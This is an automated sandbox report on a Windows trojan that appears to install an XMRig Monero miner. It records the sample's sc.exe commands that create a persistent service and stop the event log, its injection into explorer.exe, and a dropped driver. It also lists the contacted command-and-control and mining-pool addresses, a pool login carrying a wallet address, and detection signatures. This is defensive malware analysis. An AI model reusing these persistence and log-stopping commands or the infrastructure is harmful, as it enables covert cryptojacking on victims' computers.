Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
MenSncKnTI.exe

Overview

General Information

Sample name:MenSncKnTI.exe
renamed because original name is a hash value
Original sample name:eb7eb5acecb06deab2b4fce875d6c079.exe
Analysis ID:1487770
MD5:eb7eb5acecb06deab2b4fce875d6c079
SHA1:22f0ecea986b8afdaa4d2b1254757058d4c2cab3
SHA256:3b0503a6c2fb8f5cc645df4d5ab4dd9161cab9104dd1b7b8db0a89956a94bc6e
Tags:64exetrojan
Infos:

Detection

Xmrig
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Stop EventLog
System process connects to network (likely due to code injection or exploit)
Yara detected Xmrig cryptocurrency miner
AI detected suspicious sample
Detected Stratum mining protocol
Injects code into the Windows Explorer (explorer.exe)
Modifies the context of a thread in another process (thread injection)
Query firmware table information (likely to detect VMs)
Sample is not signed and drops a device driver
Contains functionality to call native functions
Creates a process in suspended mode (likely to inject code)
Creates driver files
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the windows directory (C:\Windows)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Internet Provider seen in connection with other malware
PE file contains sections with non-standard names
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Sample execution stops while process was sleeping (likely an evasion)
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • MenSncKnTI.exe (PID: 4884 cmdline: "C:\Users\user\Desktop\MenSncKnTI.exe" MD5: EB7EB5ACECB06DEAB2B4FCE875D6C079)
    • sc.exe (PID: 364 cmdline: C:\Windows\system32\sc.exe delete "CWRWVXLO" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 4436 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 5980 cmdline: C:\Windows\system32\sc.exe create "CWRWVXLO" binpath= "C:\ProgramData\uyrlkcqvoccj\gtgpwwjkduow.exe" start= "auto" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6116 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 5944 cmdline: C:\Windows\system32\sc.exe stop eventlog MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5168 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 5776 cmdline: C:\Windows\system32\sc.exe start "CWRWVXLO" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 3136 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • gtgpwwjkduow.exe (PID: 4896 cmdline: C:\ProgramData\uyrlkcqvoccj\gtgpwwjkduow.exe MD5: EB7EB5ACECB06DEAB2B4FCE875D6C079)
    • conhost.exe (PID: 2800 cmdline: C:\Windows\system32\conhost.exe MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • explorer.exe (PID: 3052 cmdline: explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)
  • svchost.exe (PID: 1464 cmdline: C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
xmrigAccording to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig
No configs have been found
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
    SourceRuleDescriptionAuthorStrings
    0000000C.00000002.4545941393.0000000001430000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
      0000000C.00000002.4545941393.0000000001360000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
        0000000C.00000002.4545941393.00000000013C0000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
          0000000C.00000002.4545941393.0000000001442000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
            0000000C.00000002.4545941393.0000000001369000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
              Source: Process startedAuthor: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: C:\Windows\system32\sc.exe create "CWRWVXLO" binpath= "C:\ProgramData\uyrlkcqvoccj\gtgpwwjkduow.exe" start= "auto", CommandLine: C:\Windows\system32\sc.exe create "CWRWVXLO" binpath= "C:\ProgramData\uyrlkcqvoccj\gtgpwwjkduow.exe" start= "auto", CommandLine|base64offset|contains: r, Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Users\user\Desktop\MenSncKnTI.exe", ParentImage: C:\Users\user\Desktop\MenSncKnTI.exe, ParentProcessId: 4884, ParentProcessName: MenSncKnTI.exe, ProcessCommandLine: C:\Windows\system32\sc.exe create "CWRWVXLO" binpath= "C:\ProgramData\uyrlkcqvoccj\gtgpwwjkduow.exe" start= "auto", ProcessId: 5980, ProcessName: sc.exe
              Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager, CommandLine: C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager, ProcessId: 1464, ProcessName: svchost.exe

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\system32\sc.exe stop eventlog, CommandLine: C:\Windows\system32\sc.exe stop eventlog, CommandLine|base64offset|contains: ), Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Users\user\Desktop\MenSncKnTI.exe", ParentImage: C:\Users\user\Desktop\MenSncKnTI.exe, ParentProcessId: 4884, ParentProcessName: MenSncKnTI.exe, ProcessCommandLine: C:\Windows\system32\sc.exe stop eventlog, ProcessId: 5944, ProcessName: sc.exe
              No Snort rule has matched
              Timestamp:2024-08-05T06:00:59.258097+0200
              SID:2051004
              Source Port:49400
              Destination Port:80
              Protocol:TCP
              Classtype:Crypto Currency Mining Activity Detected
              Timestamp:2024-08-05T05:57:58.301795+0200
              SID:2051004
              Source Port:49711
              Destination Port:80
              Protocol:TCP
              Classtype:Crypto Currency Mining Activity Detected
              Timestamp:2024-08-05T05:58:57.306162+0200
              SID:2051004
              Source Port:49393
              Destination Port:80
              Protocol:TCP
              Classtype:Crypto Currency Mining Activity Detected
              Timestamp:2024-08-05T06:01:59.170763+0200
              SID:2051004
              Source Port:49402
              Destination Port:80
              Protocol:TCP
              Classtype:Crypto Currency Mining Activity Detected
              Timestamp:2024-08-05T05:59:57.728119+0200
              SID:2051004
              Source Port:49397
              Destination Port:80
              Protocol:TCP
              Classtype:Crypto Currency Mining Activity Detected
              Timestamp:2024-08-05T05:57:52.917756+0200
              SID:2826930
              Source Port:49710
              Destination Port:10128
              Protocol:TCP
              Classtype:Crypto Currency Mining Activity Detected

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: http://185.196.9.187/api/endpoint.phpVirustotal: Detection: 5%Perma Link
              Source: C:\ProgramData\uyrlkcqvoccj\gtgpwwjkduow.exeReversingLabs: Detection: 78%
              Source: C:\ProgramData\uyrlkcqvoccj\gtgpwwjkduow.exeVirustotal: Detection: 61%Perma Link
              Source: MenSncKnTI.exeVirustotal: Detection: 61%Perma Link
              Source: MenSncKnTI.exeReversingLabs: Detection: 78%
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability

              Bitcoin Miner

              barindex
              Source: Yara matchFile source: dump.pcap, type: PCAP
              Source: Yara matchFile source: 0000000C.00000002.4545941393.0000000001430000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000002.4545941393.0000000001360000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000002.4545941393.00000000013C0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000002.4545941393.0000000001442000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000002.4545941393.0000000001369000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: global trafficTCP traffic: 192.168.2.6:49710 -> 149.102.143.109:10128 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"4abmdjxp9mj7jkiqw8cgx2gqhqw9z8ggojeoefxscglxvbpczu7cxg32qz9ttmngyqk89iwdjqa2cpebd1p7tdaqn4tuchn","pass":"x","agent":"xmrig/6.21.3 (windows nt 10.0; win64; x64) libuv/1.38.0 msvc/2022","rigid":"","algo":["rx/0","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/upx2","cn/1","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","argon2/chukwa","argon2/chukwav2","argon2/ninja","ghostrider"]}}.
              Source: MenSncKnTI.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
              Source: Binary string: 3A{f.DwBM_RheeDwQL9qN[l%@Da`iWI^~z@3[=u?NlLo~q |qW\W({9bHeQgKVUZC#@UmFVXNl?@wZS6\A.b||Yx_^;Zh#DrQmDB,3@:sfiFWFa+0ZwV,}S[n"FEqvx.PDBK.Ej@nYROR,_{oX@ source: conhost.exe, 0000000B.00000002.4546124220.0000025213900000.00000004.00000001.00020000.00000000.sdmp
              Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: gtgpwwjkduow.exe, 0000000A.00000003.2102431406.00000241D0430000.00000004.00000001.00020000.00000000.sdmp

              Networking

              barindex
              Source: C:\Windows\explorer.exeNetwork Connect: 185.196.9.187 80Jump to behavior
              Source: C:\Windows\explorer.exeNetwork Connect: 149.102.143.109 10128Jump to behavior
              Source: global trafficTCP traffic: 192.168.2.6:49710 -> 149.102.143.109:10128
              Source: Joe Sandbox ViewASN Name: SIMPLECARRIERCH SIMPLECARRIERCH
              Source: Joe Sandbox ViewASN Name: COGENT-174US COGENT-174US
              Source: unknownTCP traffic detected without corresponding DNS query: 185.196.9.187
              Source: unknownTCP traffic detected without corresponding DNS query: 185.196.9.187
              Source: unknownTCP traffic detected without corresponding DNS query: 185.196.9.187
              Source: unknownTCP traffic detected without corresponding DNS query: 185.196.9.187
              Source: unknownTCP traffic detected without corresponding DNS query: 185.196.9.187
              Source: unknownTCP traffic detected without corresponding DNS query: 185.196.9.187
              Source: unknownTCP traffic detected without corresponding DNS query: 185.196.9.187
              Source: unknownTCP traffic detected without corresponding DNS query: 185.196.9.187
              Source: unknownTCP traffic detected without corresponding DNS query: 185.196.9.187
              Source: unknownTCP traffic detected without corresponding DNS query: 185.196.9.187
              Source: unknownTCP traffic detected without corresponding DNS query: 185.196.9.187
              Source: unknownTCP traffic detected without corresponding DNS query: 185.196.9.187
              Source: unknownTCP traffic detected without corresponding DNS query: 185.196.9.187
              Source: unknownTCP traffic detected without corresponding DNS query: 185.196.9.187
              Source: unknownTCP traffic detected without corresponding DNS query: 185.196.9.187
              Source: unknownTCP traffic detected without corresponding DNS query: 185.196.9.187
              Source: unknownTCP traffic detected without corresponding DNS query: 185.196.9.187
              Source: unknownTCP traffic detected without corresponding DNS query: 185.196.9.187
              Source: unknownTCP traffic detected without corresponding DNS query: 185.196.9.187
              Source: unknownTCP traffic detected without corresponding DNS query: 185.196.9.187
              Source: unknownTCP traffic detected without corresponding DNS query: 185.196.9.187
              Source: unknownTCP traffic detected without corresponding DNS query: 185.196.9.187
              Source: unknownTCP traffic detected without corresponding DNS query: 185.196.9.187
              Source: unknownTCP traffic detected without corresponding DNS query: 185.196.9.187
              Source: unknownTCP traffic detected without corresponding DNS query: 185.196.9.187
              Source: unknownTCP traffic detected without corresponding DNS query: 185.196.9.187
              Source: unknownTCP traffic detected without corresponding DNS query: 185.196.9.187
              Source: unknownTCP traffic detected without corresponding DNS query: 185.196.9.187
              Source: unknownTCP traffic detected without corresponding DNS query: 185.196.9.187
              Source: unknownTCP traffic detected without corresponding DNS query: 185.196.9.187
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficDNS traffic detected: DNS query: gulf.moneroocean.stream
              Source: unknownHTTP traffic detected: POST /api/endpoint.php HTTP/1.1Accept: */*Connection: closeContent-Length: 487Content-Type: application/jsonHost: 185.196.9.187User-Agent: cpp-httplib/0.12.6
              Source: gtgpwwjkduow.exe, 0000000A.00000003.2102431406.00000241D0430000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/ObjectSign.crl0
              Source: gtgpwwjkduow.exe, 0000000A.00000003.2102431406.00000241D0430000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/Root.crl0
              Source: gtgpwwjkduow.exe, 0000000A.00000003.2102431406.00000241D0430000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/RootSignPartners.crl0
              Source: gtgpwwjkduow.exe, 0000000A.00000003.2102431406.00000241D0430000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/primobject.crl0
              Source: C:\Windows\System32\conhost.exeCode function: 11_2_0000000140001394 NtUnloadKey,11_2_0000000140001394
              Source: C:\ProgramData\uyrlkcqvoccj\gtgpwwjkduow.exeFile created: C:\Windows\TEMP\mrjtggjdzomz.sysJump to behavior
              Source: C:\Windows\System32\conhost.exeCode function: 11_2_000000014000324011_2_0000000140003240
              Source: C:\Windows\System32\conhost.exeCode function: 11_2_00000001400027D011_2_00000001400027D0
              Source: Joe Sandbox ViewDropped File: C:\Windows\Temp\mrjtggjdzomz.sys 11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
              Source: classification engineClassification label: mal100.evad.mine.winEXE@19/2@1/2
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4436:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6116:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3136:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5168:120:WilError_03
              Source: C:\ProgramData\uyrlkcqvoccj\gtgpwwjkduow.exeFile created: C:\Windows\TEMP\mrjtggjdzomz.sysJump to behavior
              Source: C:\ProgramData\uyrlkcqvoccj\gtgpwwjkduow.exeProcess created: C:\Windows\explorer.exe
              Source: C:\ProgramData\uyrlkcqvoccj\gtgpwwjkduow.exeProcess created: C:\Windows\explorer.exeJump to behavior
              Source: MenSncKnTI.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
              Source: C:\Users\user\Desktop\MenSncKnTI.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: MenSncKnTI.exeVirustotal: Detection: 61%
              Source: MenSncKnTI.exeReversingLabs: Detection: 78%
              Source: C:\Users\user\Desktop\MenSncKnTI.exeFile read: C:\Users\user\Desktop\MenSncKnTI.exeJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\MenSncKnTI.exe "C:\Users\user\Desktop\MenSncKnTI.exe"
              Source: C:\Users\user\Desktop\MenSncKnTI.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "CWRWVXLO"
              Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\MenSncKnTI.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe create "CWRWVXLO" binpath= "C:\ProgramData\uyrlkcqvoccj\gtgpwwjkduow.exe" start= "auto"
              Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\MenSncKnTI.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop eventlog
              Source: C:\Users\user\Desktop\MenSncKnTI.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe start "CWRWVXLO"
              Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: unknownProcess created: C:\ProgramData\uyrlkcqvoccj\gtgpwwjkduow.exe C:\ProgramData\uyrlkcqvoccj\gtgpwwjkduow.exe
              Source: C:\ProgramData\uyrlkcqvoccj\gtgpwwjkduow.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe
              Source: C:\ProgramData\uyrlkcqvoccj\gtgpwwjkduow.exeProcess created: C:\Windows\explorer.exe explorer.exe
              Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
              Source: C:\Users\user\Desktop\MenSncKnTI.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "CWRWVXLO"Jump to behavior
              Source: C:\Users\user\Desktop\MenSncKnTI.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe create "CWRWVXLO" binpath= "C:\ProgramData\uyrlkcqvoccj\gtgpwwjkduow.exe" start= "auto"Jump to behavior
              Source: C:\Users\user\Desktop\MenSncKnTI.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop eventlogJump to behavior
              Source: C:\Users\user\Desktop\MenSncKnTI.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe start "CWRWVXLO"Jump to behavior
              Source: C:\ProgramData\uyrlkcqvoccj\gtgpwwjkduow.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exeJump to behavior
              Source: C:\ProgramData\uyrlkcqvoccj\gtgpwwjkduow.exeProcess created: C:\Windows\explorer.exe explorer.exeJump to behavior
              Source: C:\Users\user\Desktop\MenSncKnTI.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\ProgramData\uyrlkcqvoccj\gtgpwwjkduow.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: umpdc.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: licensemanagersvc.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: licensemanager.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: clipc.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
              Source: MenSncKnTI.exeStatic PE information: Image base 0x140000000 > 0x60000000
              Source: MenSncKnTI.exeStatic file information: File size 5219328 > 1048576
              Source: MenSncKnTI.exeStatic PE information: Raw size of .data is bigger than: 0x100000 < 0x4efe00
              Source: MenSncKnTI.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
              Source: Binary string: 3A{f.DwBM_RheeDwQL9qN[l%@Da`iWI^~z@3[=u?NlLo~q |qW\W({9bHeQgKVUZC#@UmFVXNl?@wZS6\A.b||Yx_^;Zh#DrQmDB,3@:sfiFWFa+0ZwV,}S[n"FEqvx.PDBK.Ej@nYROR,_{oX@ source: conhost.exe, 0000000B.00000002.4546124220.0000025213900000.00000004.00000001.00020000.00000000.sdmp
              Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: gtgpwwjkduow.exe, 0000000A.00000003.2102431406.00000241D0430000.00000004.00000001.00020000.00000000.sdmp
              Source: MenSncKnTI.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
              Source: MenSncKnTI.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
              Source: MenSncKnTI.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
              Source: MenSncKnTI.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
              Source: MenSncKnTI.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
              Source: MenSncKnTI.exeStatic PE information: section name: .00cfg
              Source: gtgpwwjkduow.exe.1.drStatic PE information: section name: .00cfg
              Source: C:\Windows\System32\conhost.exeCode function: 11_2_0000000140001394 push qword ptr [0000000140009004h]; ret 11_2_0000000140001403

              Persistence and Installation Behavior

              barindex
              Source: C:\ProgramData\uyrlkcqvoccj\gtgpwwjkduow.exeFile created: C:\Windows\TEMP\mrjtggjdzomz.sysJump to behavior
              Source: C:\ProgramData\uyrlkcqvoccj\gtgpwwjkduow.exeFile created: C:\Windows\Temp\mrjtggjdzomz.sysJump to dropped file
              Source: C:\Users\user\Desktop\MenSncKnTI.exeFile created: C:\ProgramData\uyrlkcqvoccj\gtgpwwjkduow.exeJump to dropped file
              Source: C:\Users\user\Desktop\MenSncKnTI.exeFile created: C:\ProgramData\uyrlkcqvoccj\gtgpwwjkduow.exeJump to dropped file
              Source: C:\ProgramData\uyrlkcqvoccj\gtgpwwjkduow.exeFile created: C:\Windows\Temp\mrjtggjdzomz.sysJump to dropped file
              Source: C:\Users\user\Desktop\MenSncKnTI.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "CWRWVXLO"
              Source: C:\Windows\explorer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Source: C:\Windows\explorer.exeSystem information queried: FirmwareTableInformationJump to behavior
              Source: C:\ProgramData\uyrlkcqvoccj\gtgpwwjkduow.exeDropped PE file which has not been started: C:\Windows\Temp\mrjtggjdzomz.sysJump to dropped file
              Source: C:\Windows\System32\conhost.exeAPI coverage: 0.9 %
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: conhost.exe, 0000000B.00000002.4546124220.0000025213900000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: ^l1S]EeYK#@X@#fF}]i!qbp{YNEchsZ=hgfs``0e,R~iPA[1]82>3\eBSm"zmX9u(]3>=B[5XnyXqQB2\dc|>EaPMa}^W&QfjGk@LYal{x}`igU_w=Xk:PIb/Fwu]qAnJrbFI]q[Z# -v>wQjXRS~NcZ)[_Auxzg/ot@sx@An{^V^R&orrd~[f~nI{S6GT`qH\@C=Bcs)yx~IZOV!;NNHfZ,K"x]r@OsxFjOFgiU_Z!|LBl@L>oPzERJn!'TTl=0XzNR?ZP:h'_lW^Z]n2f_r;Cb)ggvP]Qt~\pA?,\G$E}zKtyb
              Source: C:\Windows\explorer.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Windows\System32\conhost.exeCode function: 11_2_0000000140001160 Sleep,Sleep,_amsg_exit,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit,11_2_0000000140001160

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: C:\Windows\explorer.exeNetwork Connect: 185.196.9.187 80Jump to behavior
              Source: C:\Windows\explorer.exeNetwork Connect: 149.102.143.109 10128Jump to behavior
              Source: C:\ProgramData\uyrlkcqvoccj\gtgpwwjkduow.exeMemory written: PID: 3052 base: 140000000 value: 4DJump to behavior
              Source: C:\ProgramData\uyrlkcqvoccj\gtgpwwjkduow.exeMemory written: PID: 3052 base: 140001000 value: NUJump to behavior
              Source: C:\ProgramData\uyrlkcqvoccj\gtgpwwjkduow.exeMemory written: PID: 3052 base: 140665000 value: DFJump to behavior
              Source: C:\ProgramData\uyrlkcqvoccj\gtgpwwjkduow.exeMemory written: PID: 3052 base: 140834000 value: 00Jump to behavior
              Source: C:\ProgramData\uyrlkcqvoccj\gtgpwwjkduow.exeMemory written: PID: 3052 base: 1023010 value: 00Jump to behavior
              Source: C:\ProgramData\uyrlkcqvoccj\gtgpwwjkduow.exeThread register set: target process: 2800Jump to behavior
              Source: C:\ProgramData\uyrlkcqvoccj\gtgpwwjkduow.exeThread register set: target process: 3052Jump to behavior
              Source: C:\ProgramData\uyrlkcqvoccj\gtgpwwjkduow.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exeJump to behavior
              Source: C:\ProgramData\uyrlkcqvoccj\gtgpwwjkduow.exeProcess created: C:\Windows\explorer.exe explorer.exeJump to behavior
              Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
              Windows Management Instrumentation
              11
              Windows Service
              11
              Windows Service
              1
              Masquerading
              OS Credential Dumping211
              Security Software Discovery
              Remote Services1
              Archive Collected Data
              1
              Encrypted Channel
              Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts1
              Service Execution
              1
              DLL Side-Loading
              311
              Process Injection
              11
              Virtualization/Sandbox Evasion
              LSASS Memory11
              Virtualization/Sandbox Evasion
              Remote Desktop ProtocolData from Removable Media1
